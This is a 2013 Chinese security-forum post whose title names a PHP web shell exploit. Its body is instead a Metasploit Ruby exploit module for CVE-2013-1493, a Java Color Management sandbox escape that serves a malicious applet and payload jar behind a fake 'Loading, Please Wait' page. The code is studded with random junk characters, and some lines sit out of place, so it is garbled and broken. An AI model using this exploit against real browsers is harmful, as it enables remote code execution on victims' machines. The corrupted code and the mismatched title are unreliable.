找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2338|回复: 0
打印 上一主题 下一主题

STUNSHELL PHP Web Shell远程执行代码

[复制链接]
跳转到指定楼层
楼主
发表于 2013-4-4 17:31:17 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
##: y- U2 T0 Q2 f8 b- c
1 E5 q4 T: G( P
# This file is part of the Metasploit Framework and may be subject to7 V8 n# D& X& X" f5 N
# redistribution and commercial restrictions. Please see the Metasploit& w& \/ z+ _2 ]3 z
# web site for more information on licensing and terms of use.
+ O* S. I9 r% [% V$ S# http://metasploit.com/0 y8 F1 F: i' {% _) [
##+ n1 G  s; g7 B# s; q4 ?4 f& \& y
require ‘msf/core’9 J# P5 N$ T8 f- S
require ‘rex’
( ]% G- T# |6 b9 Cclass Metasploit3 < Msf::Exploit::Remote
8 J; U$ b; L. f4 R  ~4 i2 Q( uRank = NormalRanking+ k5 [( z, J. H3 [# a% Q
include Msf::Exploit::Remote::HttpServer::HTML5 q$ [' b6 h( J$ H: V2 l: ]
include Msf::Exploit::EXE
3 Z* w2 l% h% c" ]( e3 }$ R- ~  y4 a4 M5 kinclude Msf::Exploit::Remote::BrowserAutopwn5 o, h3 m4 }6 Y8 n
autopwn_info({ :javascript => false })( {2 ^& Z! x6 J  P
def initialize( info = {} ). C3 G3 K7 u9 d; O
super( update_info( info,
7 ~3 S! f$ d( P: p- d‘Name’ => ‘Java CMM Remote Code Execution’,4 Y9 z5 p  u2 j; o  h
‘Description’ => %q{
4 C4 D2 z* {5 @This module abuses the Color Management classes from a Java Applet to run9 d& k# y1 C$ `4 p0 @" N
arbitrary Java code outside of the sandbox as exploited in the wild in February
. v1 g/ @8 G4 ]1 b- x0 t7 Q2 q; Jand March of 2013. The vulnerability affects Java version 7u15 and earlier and 6u41
4 L* K4 H4 e  C7 }: ^and earlier and has been tested successfully on Windows XP SP3 and Windows 7 SP1
5 C" z& P8 ]. G2 gsystems. This exploit doesn’t bypass click-to-play, so the user must accept the java' t" e, J! `& T+ J. w, y- n, A, S; A
warning in order to run the malicious applet.$ F3 G, {/ Z& H. J
},0 ]1 g$ ]. ?2 d, z7 P0 _
‘License’ => MSF_LICENSE,
3 G5 x6 j9 r" E9 Y( k  w" {( o‘Author’ =>
0 Z; w* t( C& ]' o1 e3 |# R'Unknown', # Vulnerability discovery and Exploit
3 W2 `2 m' J% U8 o) N'juan vazquez' # Metasploit module (just ported the published exploit)& T/ z& f# U+ I9 }
],
) u( ]' W6 l4 ?& s1 N‘References’ =>
0 Q6 C7 g, ~! c8 D, k[' o+ o5 s8 _, T' u% I
[ 'CVE', '2013-1493' ],
$ D! Y1 S# \9 y. x0 q[ 'OSVDB', '90737' ],
, y, v& V3 l9 W6 j[ 'BID', '58238' ],
3 M% u& H$ z8 Z% W8 ?[ 'URL', 'https://blogs.oracle.com/security/entry/security_alert_cve_2013_1493' ],
4 ^5 H$ L1 O. _/ c[ 'URL', 'http://www.oracle.com/technetwork/topics/security/alert-cve-2013-1493-1915081.html' ],
0 G8 I! s$ W3 w3 c3 B) `[ 'URL', 'http://pastie.org/pastes/6581034' ]
- L+ W7 O* \, G],
5 |( T* ^: a6 y- E‘Platform’ => [ 'win', 'java' ],
  M9 L# J. \1 J6 O  C3 q7 c‘Payload’ => { ‘Space’ => 20480, ‘BadChars’ => ”, ‘DisableNops’ => true },
0 _5 {% n" P+ c5 F% c1 [6 L‘Targets’ =>$ ~6 v  {+ j/ s. B% j6 L
[* z* _) Q& F# N9 r2 U
[ 'Generic (Java Payload)',
  ~" F; A9 o% ?8 S* [% L: d* K{3 j# g; a) u! A" K5 ^+ ~
'Platform' => 'java',
( f9 f% v# h: @" B7 u'Arch' => ARCH_JAVA
+ _' e, |0 k1 t: w4 K- P}9 `  j5 Z8 ]3 P$ k
],
, |% E. j: g" }/ O9 ^. d7 I[ 'Windows x86 (Native Payload)'," X. m7 N, m5 M, I, `5 E
{
4 ]6 ]2 c1 ^# G& O0 I'Platform' => 'win',
) Z  c) C  k: m& S& ]9 w'Arch' => ARCH_X86
6 M" j) U! f3 d* d}# ]2 R( x8 r- e/ ?) C% n" e, P4 Z0 ~% P
]; k. E& Q) D1 ]$ u6 y
],
/ }4 r; J5 H5 p7 H5 V: ]* G‘‘DisclosureDate’ => ‘Mar 01 2013′
4 o* b9 L* V0 @% _. A$ B! R9 N))3 a5 F  _4 u5 F# r% t$ ]. @
end. X7 \% }$ b1 G" e. h
def setup1 D& }! _! h( q, E, f" P
path = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “Init.class”)
& Z& K4 J; |9 O) A@init_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }
( q' g: t5 f+ k4 d7 [2 Ypath = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “Leak.class”)
" Q4 e7 z; r$ D" @* O2 u@leak_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }
$ g9 S  u/ s: i  n- @; Y% W$ n. Opath = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “MyBufferedImage.class”)
) }# p" @" P( i4 G& V@buffered_image_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }$ h" h7 |+ _. q) C4 S+ D
path = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “MyColorSpace.class”)
! K) w& T9 M- `, h* S" T. X@color_space_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }# P, N4 t  a1 G1 Q9 m& h
@init_class_name = rand_text_alpha(“Init”.length)
5 M) x% N: j+ d@init_class.gsub!(“Init”, @init_class_name)" n" O  Q6 }; ~" a& q' Z
super% R+ M" Q% M! C9 l
end
5 J2 D8 h% r8 q3 t3 r2 P, adef on_request_uri(cli, request)
" [' L% n; g. Hprint_status(“handling request for #{request.uri}”), R; t  W# i' a) N
case request.uri0 ~7 Z, j/ v5 ^7 _* H
when /\.jar$/i) h0 }. Q& K2 u$ W* H0 _6 p
jar = payload.encoded_jar$ X: ^* w/ a/ K' ]3 [; t
jar.add_file(“#{@init_class_name}.class”, @init_class)
5 R+ G! T6 ^' Q) Hjar.add_file(“Leak.class”, @leak_class)3 a! Y+ x7 {8 }. O
jar.add_file(“MyBufferedImage.class”, @buffered_image_class)
  D# g" m0 B3 ?! N" Y+ _  Q9 T5 [jar.add_file(“MyColorSpace.class”, @color_space_class)
' M& c; @9 L- s3 ?& O1 [0 Z8 H& ADefaultTarget’ => 1,
, m/ F. K9 V1 c* Bmetasploit_str = rand_text_alpha(“metasploit”.length)/ b6 p4 [# J' m- S% p9 ~3 h
payload_str = rand_text_alpha(“payload”.length)! ^/ H  U7 b+ t" T( f& E
jar.entries.each { |entry|
6 i7 k. c# X& n$ C1 x3 D+ Qentry.name.gsub!(“metasploit”, metasploit_str)5 N: x  K+ q* T9 B+ n$ R$ E
entry.name.gsub!(“Payload”, payload_str)
3 y1 Y; n) Y& Y; @3 Hentry.data = entry.data.gsub(“metasploit”, metasploit_str)
, M/ t1 Q, f2 D0 T% dentry.data = entry.data.gsub(“Payload”, payload_str)
9 M4 k# |  A8 M4 Z  F5 I}2 w* N3 @4 O3 c3 Y3 Z
jar.build_manifest/ L) N; ?% \0 E0 G# B9 A) Y) ?
send_response(cli, jar, { ‘Content-Type’ => “application/octet-stream” })# k$ D; y5 C: h5 B, t
when /\/$/6 R& B' o* T; `0 ~( O
payload = regenerate_payload(cli)& P- a+ r8 y2 [( ?! y
if not payload- f5 S% J- Q6 d. v
print_error(“Failed to generate the payload.”)
+ B4 T0 H) T' |2 _send_not_found(cli)
, j1 Q# a  J& J2 k: U3 K; Nreturn2 S  z1 P* G6 _2 ~9 L6 E; w7 Q. J3 e/ P
end9 J3 g( v8 y* j& z, B! W
send_response_html(cli, generate_html, { ‘Content-Type’ => ‘text/html’ })+ X0 x* |7 G+ P" D7 R+ B
else1 D; q  a' t1 m& I9 ^( @+ r) T
send_redirect(cli, get_resource() + ‘/’, ”)& p* P+ B. V+ d2 ]* Y8 h
end
( }: Z7 e( K+ G1 [: oend7 i$ D2 O2 C! Z2 [# S2 a5 l- Y
def generate_html+ x/ W2 j9 ?& @$ K' b9 V# _* q
html = %Q|<html><head><title>Loading, Please Wait…</title></head>|
/ Q7 R1 o. u) F4 b2 V3 }  zhtml += %Q|<body><center><p>Loading, Please Wait…</p></center>|
# o, W4 ]9 l9 ~0 Qhtml += %Q|<applet archive=”#{rand_text_alpha(8)}.jar” code=”#{@init_class_name}.class” width=”1″ height=”1″>|
: Z, @# [* p* h7 Ehtml += %Q|</applet></body></html>|& ]" Q, P% j7 p9 s+ V, M, a' O; _$ ]
return html+ A$ C; S$ L& S# Y
end7 I# y$ g$ i/ z9 z) n- `
end
8 A3 k* ]8 o) K2 w! G4 E% A: yend8 a: d& O6 \7 S
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表